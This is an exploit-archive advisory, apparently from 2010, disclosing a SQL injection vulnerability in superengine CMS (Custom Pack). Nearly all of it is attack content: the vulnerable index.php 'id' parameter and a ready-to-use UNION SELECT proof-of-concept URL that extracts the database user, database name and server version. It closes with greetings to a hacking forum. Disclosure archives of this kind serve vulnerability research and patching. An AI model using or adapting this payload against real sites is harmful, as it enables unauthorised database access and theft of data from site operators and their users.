[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : superengine CMS (Custom Pack) SQL Injection Vulnerability
# Published : 2010-02-15
# Author : 10n1z3d
# Previous Title : Généré par KDPics v1.18 Remote Add Admin
# Next Title : WordPress Copperleaf Photolog SQL injection
_______ _|__| | ____________ ____ ____
_/ __ / / | | ___ / _ / _/ __
___/ /| | |__/ ( <_> ) | ___/
___ >_/ |__|____/_____ ____/|___| /___ >
/ / / / .org
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: 15/02/2010
---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
http://[server]/index.php?mod=0&id=1[SQLI]
PoC:
http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
---------------------------------------------------------
Greetz to all evilzone.org members.